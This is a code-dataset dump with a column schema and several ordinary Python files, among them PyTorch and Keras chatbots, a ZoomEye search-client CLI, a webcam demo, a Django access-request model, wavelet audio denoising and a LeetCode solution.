Dataset schema (column → dtype):

| column | dtype |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| qsc_code_num_words_quality_signal | int64 |
| qsc_code_num_chars_quality_signal | float64 |
| qsc_code_mean_word_length_quality_signal | float64 |
| qsc_code_frac_words_unique_quality_signal | float64 |
| qsc_code_frac_chars_top_2grams_quality_signal | float64 |
| qsc_code_frac_chars_top_3grams_quality_signal | float64 |
| qsc_code_frac_chars_top_4grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | float64 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | float64 |
| qsc_code_frac_chars_digital_quality_signal | float64 |
| qsc_code_frac_chars_whitespace_quality_signal | float64 |
| qsc_code_size_file_byte_quality_signal | float64 |
| qsc_code_num_lines_quality_signal | float64 |
| qsc_code_num_chars_line_max_quality_signal | float64 |
| qsc_code_num_chars_line_mean_quality_signal | float64 |
| qsc_code_frac_chars_alphabet_quality_signal | float64 |
| qsc_code_frac_chars_comments_quality_signal | float64 |
| qsc_code_cate_xml_start_quality_signal | float64 |
| qsc_code_frac_lines_dupe_lines_quality_signal | float64 |
| qsc_code_cate_autogen_quality_signal | float64 |
| qsc_code_frac_lines_long_string_quality_signal | float64 |
| qsc_code_frac_chars_string_length_quality_signal | float64 |
| qsc_code_frac_chars_long_word_length_quality_signal | float64 |
| qsc_code_frac_lines_string_concat_quality_signal | float64 |
| qsc_code_cate_encoded_data_quality_signal | float64 |
| qsc_code_frac_chars_hex_words_quality_signal | float64 |
| qsc_code_frac_lines_prompt_comments_quality_signal | float64 |
| qsc_code_frac_lines_assert_quality_signal | float64 |
| qsc_codepython_cate_ast_quality_signal | float64 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | float64 |
| qsc_codepython_cate_var_zero_quality_signal | bool |
| qsc_codepython_frac_lines_pass_quality_signal | float64 |
| qsc_codepython_frac_lines_import_quality_signal | float64 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | float64 |
| qsc_codepython_score_lines_no_logic_quality_signal | float64 |
| qsc_codepython_frac_lines_print_quality_signal | float64 |
| qsc_code_num_words | int64 |
| qsc_code_num_chars | int64 |
| qsc_code_mean_word_length | int64 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | int64 |
| qsc_code_frac_chars_top_3grams | int64 |
| qsc_code_frac_chars_top_4grams | int64 |
| qsc_code_frac_chars_dupe_5grams | int64 |
| qsc_code_frac_chars_dupe_6grams | int64 |
| qsc_code_frac_chars_dupe_7grams | int64 |
| qsc_code_frac_chars_dupe_8grams | int64 |
| qsc_code_frac_chars_dupe_9grams | int64 |
| qsc_code_frac_chars_dupe_10grams | int64 |
| qsc_code_frac_chars_replacement_symbols | int64 |
| qsc_code_frac_chars_digital | int64 |
| qsc_code_frac_chars_whitespace | int64 |
| qsc_code_size_file_byte | int64 |
| qsc_code_num_lines | int64 |
| qsc_code_num_chars_line_max | int64 |
| qsc_code_num_chars_line_mean | int64 |
| qsc_code_frac_chars_alphabet | int64 |
| qsc_code_frac_chars_comments | int64 |
| qsc_code_cate_xml_start | int64 |
| qsc_code_frac_lines_dupe_lines | int64 |
| qsc_code_cate_autogen | int64 |
| qsc_code_frac_lines_long_string | int64 |
| qsc_code_frac_chars_string_length | int64 |
| qsc_code_frac_chars_long_word_length | int64 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | int64 |
| qsc_code_frac_chars_hex_words | int64 |
| qsc_code_frac_lines_prompt_comments | int64 |
| qsc_code_frac_lines_assert | int64 |
| qsc_codepython_cate_ast | int64 |
| qsc_codepython_frac_lines_func_ratio | int64 |
| qsc_codepython_cate_var_zero | int64 |
| qsc_codepython_frac_lines_pass | int64 |
| qsc_codepython_frac_lines_import | int64 |
| qsc_codepython_frac_lines_simplefunc | int64 |
| qsc_codepython_score_lines_no_logic | int64 |
| qsc_codepython_frac_lines_print | int64 |
| effective | string |
| hits | int64 |
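
Several of the qsc_code_* columns are plain text statistics computed over `content`. As a rough illustration, a few of them can be recomputed as below; this is a minimal sketch that assumes whitespace tokenization and the obvious definitions, which may differ in detail from the pipeline that actually produced these rows.

```python
from collections import Counter

def quality_signals(content: str) -> dict:
    """Approximate a handful of the qsc_code_* columns for one file."""
    words = content.split()
    lines = content.splitlines()
    line_counts = Counter(lines)
    n_words = max(len(words), 1)
    n_chars = max(len(content), 1)
    return {
        "qsc_code_num_words": len(words),
        "qsc_code_num_chars": len(content),
        "qsc_code_mean_word_length": sum(map(len, words)) / n_words,
        "qsc_code_frac_words_unique": len(set(words)) / n_words,
        "qsc_code_frac_chars_whitespace": sum(c.isspace() for c in content) / n_chars,
        # fraction of lines that occur more than once in the file
        "qsc_code_frac_lines_dupe_lines": sum(n for n in line_counts.values() if n > 1) / max(len(lines), 1),
    }

print(quality_signals("import os\nimport os\n"))
```

For working with rows of this shape programmatically, something like the sketch below is enough; the Parquet file name is a placeholder, since this dump does not say how or where the rows are stored.

```python
import pandas as pd

# Placeholder path; storage format and location are assumptions.
df = pd.read_parquet("rows.parquet")

# Example filter in the spirit of the quality signals: keep files that
# parse (cate_ast == 1) and are not dominated by duplicated lines.
keep = df[
    (df["qsc_codepython_cate_ast_quality_signal"] == 1)
    & (df["qsc_code_frac_lines_dupe_lines_quality_signal"] < 0.3)
]
print(keep[["max_stars_repo_name", "size", "avg_line_length"]].head())
```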

---
hexsha: cdeaa27ba25e454daf95595f163fae1a13887999 | size: 1,220 | ext: py | lang: Python
repo: Programmer-RD-AI/Learning-NLP-PyTorch | path: chat.py | head_hexsha: 5780598340308995c0b8436d3031aa58ee7b81da | licenses: ["Apache-2.0"] (identical across the max_stars, max_issues and max_forks views)
max_stars_count: null | max_issues_count: null | max_forks_count: null (all event datetimes null)
content:
import random
import json
import torch
from model import NeuralNet
from nltk_utils import *
device = "cuda"
with open('intents.json','r') as f:
intents = json.load(f)
FILE = 'data.pth'
data = torch.load(FILE, map_location=device)  # load the checkpoint onto whichever device is in use
input_size = data['input_size']
output_size = data['output_size']
hidden_size = data['hidden_size']
all_words = data['all_words']
tags = data['tags']
model_state = data['model_state']
model = NeuralNet(input_size, hidden_size, output_size).to(device)
model.load_state_dict(model_state)
model.eval()
bot_name = 'Programmer-RD-AI'
print('Let\'s chat! Type "quit" to exit')
while True:
sentence = input('You : ')
if sentence == 'quit':
break
sentence = tokenize(sentence)
X = bag_of_words(sentence,all_words)
X = X.reshape(1,X.shape[0])
X = torch.from_numpy(X).to(device)
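    # forward pass: the model emits one logit per intent tag; the softmax
    # further below turns a copy of these logits into a confidence score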
pred = model(X)
pred_ = pred.clone()
_,pred = torch.max(pred,dim=1)
tag = tags[pred.item()]
probs = torch.softmax(pred_,dim=1)
prob = probs[0][pred.item()]
if prob.item() > 0.75:
for intent in intents['intents']:
if tag == intent['tag']:
print(f'{bot_name}: {random.choice(intent["responses"])}')
else:
print(f'{bot_name}: IDK..')
avg_line_length: 29.047619 | max_line_length: 74 | alphanum_fraction: 0.648361
quality signals (*_quality_signal): num_words 180 | num_chars 1,220 | mean_word_length 4.244444 | frac_words_unique 0.416667 | frac_chars_top_2/3/4grams 0.03534 / 0.036649 / 0.034031 | frac_chars_dupe_5-10grams all 0 | frac_chars_replacement_symbols 0 | frac_chars_digital 0.00813 | frac_chars_whitespace 0.193443 | size_file_byte 1,220 | num_lines 41 | num_chars_line_max 75 | num_chars_line_mean 29.756098 | frac_chars_alphabet 0.768293 | frac_chars_comments 0 | cate_xml_start 0 | frac_lines_dupe_lines 0 | cate_autogen 0 | frac_lines_long_string 0 | frac_chars_string_length 0.17459 | frac_chars_long_word_length 0.029508 | frac_lines_string_concat 0 | cate_encoded_data 0 | frac_chars_hex_words 0 | frac_lines_prompt_comments 0 | frac_lines_assert 0
codepython signals: cate_ast 1 | frac_lines_func_ratio 0 | cate_var_zero false | frac_lines_pass 0 | frac_lines_import 0.121951 | frac_lines_simplefunc 0 | score_lines_no_logic 0.121951 | frac_lines_print 0.073171
unsuffixed qsc_* duplicate columns: all 0 (frac_words_unique and frac_lines_string_concat: null) | effective: 1 | hits: 0

---
hexsha: cdecd7c4bafe572b5e961bd73c1a75878f9feaa8 | size: 3,428 | ext: py | lang: Python
repo: r0oike/zoomeye-python | path: zoomeye/cli.py | head_hexsha: b93f1c9c350e4fce7580f9f71ab1e76d06ce165d | licenses: ["Apache-2.0"] (identical across the max_stars, max_issues and max_forks views)
max_stars_count: null | max_issues_count: null | max_forks_count: null (all event datetimes null)
content:
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
* Filename: cli.py
* Description: cli program entry
* Time: 2020.11.30
* Author: liuf5
"""
import os
import sys
import argparse
module_path = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
sys.path.insert(1, module_path)
from zoomeye import core
class ZoomEyeParser(argparse.ArgumentParser):
def error(self, message):
self.print_help()
sys.exit(2)
def main():
"""
parse user input args
:return:
"""
parser = ZoomEyeParser()
subparsers = parser.add_subparsers()
# zoomeye account info
parser_info = subparsers.add_parser("info", help="Show ZoomEye account info")
parser_info.set_defaults(func=core.info)
# query zoomeye data
parser_search = subparsers.add_parser(
"search",
help="Search the ZoomEye database"
)
parser_search.add_argument(
"dork",
help="The ZoomEye search keyword or ZoomEye exported file"
)
parser_search.add_argument(
"-num",
default=20,
help="The number of search results that should be returned",
type=int,
metavar='value'
)
parser_search.add_argument(
"-facet",
default=None,
nargs='?',
const='app,device,service,os,port,country,city',
type=str,
help=('''
Perform statistics on ZoomEye database,
field: [app,device,service,os,port,country,city]
'''),
metavar='field'
)
parser_search.add_argument(
"-filter",
default=None,
metavar='field=regexp',
nargs='?',
const='app',
type=str,
help=('''
        Output clearer search results by setting a filter field,
field: [app,version,device,port,city,country,asn,banner,*]
''')
)
parser_search.add_argument(
'-stat',
default=None,
metavar='field',
nargs='?',
const='app,device,service,os,port,country,city',
type=str,
help=('''
Perform statistics on search results,
field: [app,device,service,os,port,country,city]
''')
)
parser_search.add_argument(
"-save",
default=None,
metavar='field=regexp',
help=('''
Save the search results with ZoomEye json format,
if you specify the field, it will be saved with JSON Lines
'''),
nargs='?',
type=str,
const='all'
)
parser_search.add_argument(
"-count",
help="The total number of results in ZoomEye database for a search",
action="store_true"
)
parser_search.set_defaults(func=core.search)
# initial account configuration related commands
parser_init = subparsers.add_parser("init", help="Initialize the token for ZoomEye-python")
parser_init.add_argument("-apikey", help="ZoomEye API Key", default=None, metavar='[api key]')
parser_init.add_argument("-username", help="ZoomEye account username", default=None, metavar='[username]')
parser_init.add_argument("-password", help="ZoomEye account password", default=None, metavar='[password]')
parser_init.set_defaults(func=core.init)
args = parser.parse_args()
try:
args.func(args)
except AttributeError:
parser.print_help()
if __name__ == '__main__':
main()
avg_line_length: 26.369231 | max_line_length: 110 | alphanum_fraction: 0.606768
quality signals (*_quality_signal): num_words 392 | num_chars 3,428 | mean_word_length 5.17602 | frac_words_unique 0.369898 | frac_chars_top_2/3/4grams 0.059142 / 0.05175 / 0.079349 | frac_chars_dupe_5-10grams 0.18137 / 0.109414 / 0.109414 / 0.109414 / 0.071957 / 0.071957 | frac_chars_replacement_symbols 0 | frac_chars_digital 0.005983 | frac_chars_whitespace 0.26867 | size_file_byte 3,428 | num_lines 129 | num_chars_line_max 111 | num_chars_line_mean 26.573643 | frac_chars_alphabet 0.803351 | frac_chars_comments 0.073221 | cate_xml_start 0 | frac_lines_dupe_lines 0.34375 | cate_autogen 0 | frac_lines_long_string 0 | frac_chars_string_length 0.353147 | frac_chars_long_word_length 0.067069 | frac_lines_string_concat 0 | cate_encoded_data 0 | frac_chars_hex_words 0 | frac_lines_prompt_comments 0 | frac_lines_assert 0
codepython signals: cate_ast 1 | frac_lines_func_ratio 0.020833 | cate_var_zero false | frac_lines_pass 0.010417 | frac_lines_import 0.041667 | frac_lines_simplefunc 0 | score_lines_no_logic 0.072917 | frac_lines_print 0.020833
unsuffixed qsc_* duplicate columns: all 0 (frac_words_unique and frac_lines_string_concat: null) | effective: 1 | hits: 0

---
hexsha: cdeceab8b898ec021afc4aa90ddeda2bd76d683c | size: 862 | ext: py | lang: Python
repo: RezaFirouzii/python-opencv-review | path: 3) Cartoonizing and Video Capture/#1 Accessing the webcam/webcam_access.py | head_hexsha: 454a2be7fa36516a2b1fbd4e6162068bba25c989 | licenses: ["MIT"] (identical across the max_stars, max_issues and max_forks views)
max_stars_count: null | max_issues_count: null | max_forks_count: null (all event datetimes null)
content:
import cv2 as cv
if __name__ == "__main__":
# 0 => first (default) webcam connected,
# 1 => second webcam and so on.
cap = cv.VideoCapture(0, cv.CAP_DSHOW)
# cv.namedWindow("Window")
if not cap.isOpened():
raise IOError("Webcam could not be opened!")
while True:
res, frame = cap.read() # returns (bool, ndarray)
# in case any error occurs
if not res:
break
frame = cv.resize(frame, None, fx=.5, fy=.5)
cv.imshow("Video Stream", frame)
keyboardInput = cv.waitKey(1)
if keyboardInput == 27: # ESC button ascii code
break
cap.release()
cv.destroyAllWindows()
# you can also replace a normal video with webcam
# in video capture object, just give it the address of
# the video instead of 0 or number of your webcam
avg_line_length: 25.352941 | max_line_length: 61 | alphanum_fraction: 0.597448
quality signals (*_quality_signal): num_words 116 | num_chars 862 | mean_word_length 4.362069 | frac_words_unique 0.681034 | frac_chars_top_2/3/4grams 0.019763 / 0 / 0 | frac_chars_dupe_5-10grams all 0 | frac_chars_replacement_symbols 0 | frac_chars_digital 0.016722 | frac_chars_whitespace 0.306265 | size_file_byte 862 | num_lines 33 | num_chars_line_max 62 | num_chars_line_mean 26.121212 | frac_chars_alphabet 0.829431 | frac_chars_comments 0.363109 | cate_xml_start 0 | frac_lines_dupe_lines 0.125 | cate_autogen 0 | frac_lines_long_string 0 | frac_chars_string_length 0.087199 | frac_chars_long_word_length 0 | frac_lines_string_concat 0 | cate_encoded_data 0 | frac_chars_hex_words 0 | frac_lines_prompt_comments 0 | frac_lines_assert 0
codepython signals: cate_ast 1 | frac_lines_func_ratio 0 | cate_var_zero false | frac_lines_pass 0 | frac_lines_import 0.0625 | frac_lines_simplefunc 0 | score_lines_no_logic 0.0625 | frac_lines_print 0
unsuffixed qsc_* duplicate columns: all 0 (frac_words_unique and frac_lines_string_concat: null) | effective: 1 | hits: 0

---
hexsha: cdf16ad97ffce90e11c1fa4d69eb40752cd40a16 | size: 3,928 | ext: py | lang: Python
repo: g10f/sso | path: apps/sso/access_requests/models.py | head_hexsha: ba6eb712add388c69d4880f5620a2e4ce42d3fee | licenses: ["BSD-3-Clause"] (identical across the max_stars, max_issues and max_forks views)
max_stars_count: 3 (2021-05-16T17:06:57.000Z – 2021-05-28T17:14:05.000Z) | max_issues_count: null | max_forks_count: null
content:
import datetime
from current_user.models import CurrentUserField
from django.conf import settings
from django.db import models
from django.urls import reverse
from django.utils.timezone import now
from django.utils.translation import gettext_lazy as _
from sso.accounts.models import Application
from sso.models import AbstractBaseModel, AbstractBaseModelManager
from sso.organisations.models import is_validation_period_active, Organisation
class AccessRequestManager(AbstractBaseModelManager):
def open(self):
return self.get(status='o')
class OpenAccessRequestManager(AbstractBaseModelManager):
def get_queryset(self):
return super().get_queryset().filter(status='o').prefetch_related('user__useremail_set')
class AccessRequest(AbstractBaseModel):
STATUS_CHOICES = [
('o', _('open')), # opened by user
('c', _('canceled')), # by user
('v', _('approved')),
('d', _('denied'))
]
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
message = models.TextField(_("message"), max_length=2048,
help_text=_('Message for the administrators.'),
blank=True)
comment = models.TextField(_("Comment"), max_length=2048, blank=True)
status = models.CharField(_('status'), max_length=255, choices=STATUS_CHOICES, default='o')
last_modified_by_user = CurrentUserField(verbose_name=_('last modified by'),
related_name='accessrequest_last_modified_by',
on_delete=models.SET_NULL)
completed_by_user = models.ForeignKey(settings.AUTH_USER_MODEL, blank=True, null=True,
verbose_name=_('completed by'),
related_name='accessrequest_completed_by', on_delete=models.SET_NULL)
application = models.ForeignKey(Application, blank=True, null=True, on_delete=models.SET_NULL,
verbose_name=_('application'))
# required field if the user has no organisation
organisation = models.ForeignKey(Organisation, blank=True, null=True, on_delete=models.CASCADE)
objects = AccessRequestManager()
open = OpenAccessRequestManager()
def process(self, action=None, user=None):
if action in ['cancel', 'verify', 'deny']:
getattr(self, action)(user)
else:
raise ValueError
def cancel(self, user):
self.status = 'c'
self.completed_by_user = user
self.save()
def verify(self, user):
self.status = 'v'
self.completed_by_user = user
if self.organisation:
self.user.set_organisations([self.organisation])
# check if organisation uses user activation
validation_period_active = False
for organisation in self.user.organisations.all():
if is_validation_period_active(organisation):
self.user.valid_until = now() + datetime.timedelta(days=settings.SSO_VALIDATION_PERIOD_DAYS)
self.user.save()
validation_period_active = True
if not validation_period_active:
self.user.valid_until = None
self.user.save()
# add default member profile
self.user.role_profiles.add(user.get_default_role_profile())
self.user.role_profiles.remove(user.get_default_guest_profile())
self.save()
def deny(self, user):
self.status = 'd'
self.completed_by_user = user
self.save()
@property
def is_open(self):
return self.status == 'o'
class Meta(AbstractBaseModel.Meta):
verbose_name = _('access request')
verbose_name_plural = _('access request')
def get_absolute_url(self):
return reverse('accounts:accessrequest_detail', kwargs={'pk': self.pk})
avg_line_length: 39.28 | max_line_length: 111 | alphanum_fraction: 0.649949
quality signals (*_quality_signal): num_words 429 | num_chars 3,928 | mean_word_length 5.731935 | frac_words_unique 0.305361 | frac_chars_top_2/3/4grams 0.035787 / 0.044734 / 0.02074 | frac_chars_dupe_5-10grams 0.165921 / 0.102481 / 0.083774 / 0 / 0 / 0 | frac_chars_replacement_symbols 0 | frac_chars_digital 0.003743 | frac_chars_whitespace 0.251782 | size_file_byte 3,928 | num_lines 99 | num_chars_line_max 112 | num_chars_line_mean 39.676768 | frac_chars_alphabet 0.832936 | frac_chars_comments 0.035387 | cate_xml_start 0 | frac_lines_dupe_lines 0.102564 | cate_autogen 0 | frac_lines_long_string 0 | frac_chars_string_length 0.073222 | frac_chars_long_word_length 0.022469 | frac_lines_string_concat 0 | cate_encoded_data 0 | frac_chars_hex_words 0 | frac_lines_prompt_comments 0 | frac_lines_assert 0
codepython signals: cate_ast 1 | frac_lines_func_ratio 0.102564 | cate_var_zero false | frac_lines_pass 0 | frac_lines_import 0.128205 | frac_lines_simplefunc 0.051282 | score_lines_no_logic 0.474359 | frac_lines_print 0
unsuffixed qsc_* duplicate columns: all 0 (frac_words_unique and frac_lines_string_concat: null) | effective: 1 | hits: 0

---
hexsha: cdf35f3aa036ddd5079307083d76c1f9e474653b | size: 1,518 | ext: py | lang: Python
repo: AP-Atul/wavelets | path: test/snr_test.py | head_hexsha: cff71e777759844b35f8e96f14930b2c71a215a1 | licenses: ["MIT"] (identical across the max_stars, max_issues and max_forks views)
max_stars_count: 5 (2021-02-01T07:43:39.000Z – 2022-03-25T05:01:31.000Z) | max_issues_count: null | max_forks_count: null
content:
import os
from time import time
import numpy as np
import soundfile
from matplotlib import pyplot as plt
from wavelet.fast_transform import FastWaveletTransform
from wavelet.util.utility import threshold, mad, snr, amp_to_db
INPUT_FILE = "/example/input/file.wav"
OUTPUT_DIR = "/example/output/"
info = soundfile.info(INPUT_FILE) # getting info of the audio
rate = info.samplerate
WAVELET_NAME = "coif1"
t = FastWaveletTransform(WAVELET_NAME)
outputFileName = os.path.join(OUTPUT_DIR, "_" + WAVELET_NAME + ".wav")
noiseRatios = list()
with soundfile.SoundFile(outputFileName, "w", samplerate=rate, channels=info.channels) as of:
start = time()
for block in soundfile.blocks(INPUT_FILE, int(rate * info.duration * 0.10)): # reading 10 % of duration
coefficients = t.waveDec(block)
# VISU Shrink
sigma = mad(coefficients)
thresh = sigma * np.sqrt(2 * np.log(len(block)))
# thresholding using the noise threshold generated
coefficients = threshold(coefficients, thresh)
# getting the clean signal as in original form and writing to the file
clean = t.waveRec(coefficients)
clean = np.asarray(clean)
of.write(clean)
noiseRatios.append(snr(amp_to_db(clean)))
end = time()
x = []
for i in range(len(noiseRatios)):
x.append(i)
plt.plot(x, np.array(noiseRatios).astype(float))
plt.show()
print(f"Finished processing with {WAVELET_NAME}")
print(f"Time taken :: {end - start} s")
avg_line_length: 29.192308 | max_line_length: 108 | alphanum_fraction: 0.689065
quality signals (*_quality_signal): num_words 202 | num_chars 1,518 | mean_word_length 5.10396 | frac_words_unique 0.475248 | frac_chars_top_2/3/4grams 0.034918 / 0.015519 / 0.019399 | frac_chars_dupe_5-10grams all 0 | frac_chars_replacement_symbols 0 | frac_chars_digital 0.0058 | frac_chars_whitespace 0.204875 | size_file_byte 1,518 | num_lines 51 | num_chars_line_max 109 | num_chars_line_mean 29.764706 | frac_chars_alphabet 0.848384 | frac_chars_comments 0.118577 | cate_xml_start 0 | frac_lines_dupe_lines 0 | cate_autogen 0 | frac_lines_long_string 0 | frac_chars_string_length 0.088589 | frac_chars_long_word_length 0.017267 | frac_lines_string_concat 0 | cate_encoded_data 0 | frac_chars_hex_words 0 | frac_lines_prompt_comments 0 | frac_lines_assert 0
codepython signals: cate_ast 1 | frac_lines_func_ratio 0 | cate_var_zero false | frac_lines_pass 0 | frac_lines_import 0.205882 | frac_lines_simplefunc 0 | score_lines_no_logic 0.205882 | frac_lines_print 0.058824
unsuffixed qsc_* duplicate columns: all 0 (frac_words_unique and frac_lines_string_concat: null) | effective: 1 | hits: 0

---
hexsha: cdf93d47f329e66522fe3776469675377c2e7349 | size: 1,758 | ext: py | lang: Python
repo: chaosWsF/Python-Practice | path: leetcode/0566_reshape_the_matrix.py | head_hexsha: ff617675b6bcd125933024bb4c246b63a272314d | licenses: ["BSD-2-Clause"] (identical across the max_stars, max_issues and max_forks views)
max_stars_count: null | max_issues_count: null | max_forks_count: null (all event datetimes null)
content:
"""
In MATLAB, there is a very useful function called 'reshape', which can reshape a matrix into
a new one with different size but keep its original data. You're given a matrix represented
by a two-dimensional array, and two positive integers r and c representing the row number and
column number of the wanted reshaped matrix, respectively. The reshaped matrix needs to be filled
with all the elements of the original matrix in the same row-traversing order as they were. If
the 'reshape' operation with given parameters is possible and legal, output the new reshaped
matrix; Otherwise, output the original matrix.
Example 1:
Input:
nums = [[1, 2], [3, 4]]
r = 1, c = 4
Output:
[[1, 2, 3, 4]]
Explanation:
The row-traversing of nums is [1, 2, 3, 4]. The new reshaped matrix is a 1 * 4 matrix, fill
it row by row by using the previous list.
Example 2:
Input:
nums = [[1, 2], [3, 4]]
r = 2, c = 4
Output:
[[1, 2], [3, 4]]
Explanation:
There is no way to reshape a 2 * 2 matrix to a 2 * 4 matrix. So output the original matrix.
Note:
1. The height and width of the given matrix is in range [1, 100].
2. The given r and c are all positive.
"""
class Solution:
def matrixReshape1(self, nums, r, c): # 96ms
elements = sum(nums, [])
n = len(elements)
if r * c != n:
return nums
else:
return [elements[i:i+c] for i in range(0, n, c)]
def matrixReshape2(self, nums, r, c): # 88ms
if len(nums[0]) * len(nums) != r * c:
return nums
else:
elements = sum(nums, [])
return [elements[i:i+c] for i in range(0, len(elements), c)]
avg_line_length: 33.807692 | max_line_length: 100 | alphanum_fraction: 0.606371
quality signals (*_quality_signal): num_words 280 | num_chars 1,758 | mean_word_length 3.807143 | frac_words_unique 0.367857 | frac_chars_top_2/3/4grams 0.009381 / 0.014071 / 0.018762 | frac_chars_dupe_5-10grams 0.123827 / 0.123827 / 0.123827 / 0.097561 / 0.054409 / 0.054409 | frac_chars_replacement_symbols 0 | frac_chars_digital 0.03818 | frac_chars_whitespace 0.299772 | size_file_byte 1,758 | num_lines 51 | num_chars_line_max 101 | num_chars_line_mean 34.470588 | frac_chars_alphabet 0.827782 | frac_chars_comments 0.717861 | cate_xml_start 0 | frac_lines_dupe_lines 0.428571 | cate_autogen 0 | frac_lines_long_string 0 | frac_chars_string_length 0 | frac_chars_long_word_length 0 | frac_lines_string_concat 0 | cate_encoded_data 0 | frac_chars_hex_words 0 | frac_lines_prompt_comments 0 | frac_lines_assert 0
codepython signals: cate_ast 1 | frac_lines_func_ratio 0.142857 | cate_var_zero false | frac_lines_pass 0 | frac_lines_import 0 | frac_lines_simplefunc 0 | score_lines_no_logic 0.5 | frac_lines_print 0
unsuffixed qsc_* duplicate columns: all 0 (frac_words_unique and frac_lines_string_concat: null) | effective: 1 | hits: 0

---
hexsha: cdfba4673ccb2b05e2ef7ddcaa8aeaa3095e7451 | size: 4,629 | ext: py | lang: Python
repo: LaraProject/rnn2java | path: python/main.py | head_hexsha: f35b1b98f74864d4310e7866ad5271ae5389292d | licenses: ["MIT"] (identical across the max_stars, max_issues and max_forks views)
max_stars_count: null | max_issues_count: null | max_forks_count: null (all event datetimes null)
content:
#!/usr/bin/env python3
import socket
import select
from time import sleep
import message_pb2
from google.protobuf.internal import encoder
import tensorflow as tf
from tensorflow.keras import preprocessing
import pickle
import numpy as np
## RNN part
# Load the inference model
def load_inference_models(enc_file, dec_file):
encoder_model = tf.keras.models.load_model(enc_file)
decoder_model = tf.keras.models.load_model(dec_file)
return (encoder_model, decoder_model)
# Load the tokenizer
def load_tokenizer(tokenizer_file):
with open(tokenizer_file, 'rb') as handle:
tokenizer = pickle.load(handle)
return tokenizer
def load_length(length_file):
with open(length_file, "r") as f:
data = ((f.read()).split(","))
return int(data[0]), int(data[1])
# Talking with our Chatbot
def str_to_tokens( sentence : str, tokenizer, maxlen_questions):
words = sentence.lower().split()
tokens_list = list()
for word in words:
if word in tokenizer.word_index:
tokens_list.append(tokenizer.word_index[word])
else:
tokens_list.append(tokenizer.word_index['<unk>'])
return preprocessing.sequence.pad_sequences([tokens_list],
maxlen=maxlen_questions, padding='post')
def answer(question, enc_model, dec_model, tokenizer, maxlen_questions, maxlen_answers):
states_values = enc_model.predict(str_to_tokens(question, tokenizer, maxlen_questions))
empty_target_seq = np.zeros((1, 1))
empty_target_seq[0, 0] = tokenizer.word_index['<start>']
stop_condition = False
decoded_translation = ''
while not stop_condition:
(dec_outputs, h, c) = dec_model.predict([empty_target_seq]
+ states_values)
sampled_word_index = np.argmax(dec_outputs[0, -1, :])
sampled_word = None
for (word, index) in tokenizer.word_index.items():
if sampled_word_index == index:
decoded_translation += ' {}'.format(word)
sampled_word = word
if sampled_word == '<end>' or len(decoded_translation.split()) > maxlen_answers:
stop_condition = True
empty_target_seq = np.zeros((1, 1))
empty_target_seq[0, 0] = sampled_word_index
states_values = [h, c]
return (decoded_translation[:-5]) # remove end w
### END RNN PART ###
PORT = 9987
def recvall(sock):
BUFF_SIZE = 4096 # 4 KiB
data = b''
while True:
part = sock.recv(BUFF_SIZE)
data += part
if len(part) < BUFF_SIZE:
# either 0 or end of data
break
return data
def answer_command(question, enc_model, dec_model, tokenizer, maxlen_questions, maxlen_answers):
command = message_pb2.Command()
command.type = message_pb2.Command.ANSWER
command.name = 'ANSWER to "' + question + '"'
command.data = answer(question, enc_model, dec_model, tokenizer, maxlen_questions, maxlen_answers)
return command
def main():
# Connect over TCP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('localhost', PORT))
sock.listen(5)
# Current person
max_lengths = [[22,74]]
person = 1
enc_model, dec_model = load_inference_models("../models/" + str(person) + "/model_enc.h5", "../models/" + str(person) + "/model_dec.h5")
tokenizer = load_tokenizer("../models/" + str(person) + "/tokenizer.pickle")
maxlen_questions, maxlen_answers = load_length("../models/" + str(person) + "/length.txt")
cmd = message_pb2.Command()
over = False
    while not over:
conn, addr = sock.accept()
#conn.setblocking(0)
while True:
data = conn.recv(4096)
if not data: break
ready = select.select([conn], [], [], 1.0)
if ready[0]:
data += recvall(conn)
cmd.ParseFromString(data)
if (cmd.type == message_pb2.Command.CommandType.QUESTION):
print("Question : '" + cmd.data + "' received.")
conn.send(answer_command(cmd.data, enc_model, dec_model, tokenizer, maxlen_questions, maxlen_answers).SerializeToString())
print("Question answered.")
conn.close()
break
elif (cmd.type == message_pb2.Command.CommandType.ANSWER):
print("Error, only questions are accepted.")
over = True
conn.close()
break
elif (cmd.type == message_pb2.Command.CommandType.SWITCH_PERSON):
print("Switching to person" + cmd.data)
person = int(cmd.data)
enc_model, dec_model = load_inference_models("../models/" + str(person) + "/model_enc.h5", "../models/" + str(person) + "/model_dec.h5")
tokenizer = load_tokenizer("../models/" + str(person) + "/tokenizer.pickle")
maxlen_questions, maxlen_answers = load_length("../models/" + str(person) + "/length.txt")
conn.close()
break
elif (cmd.type == message_pb2.Command.CommandType.SHUTDOWN):
print("Quiting.")
over = True
conn.close()
break
sleep(1)
sock.close()
if __name__ == '__main__':
main()
avg_line_length: 32.598592 | max_line_length: 140 | alphanum_fraction: 0.712249
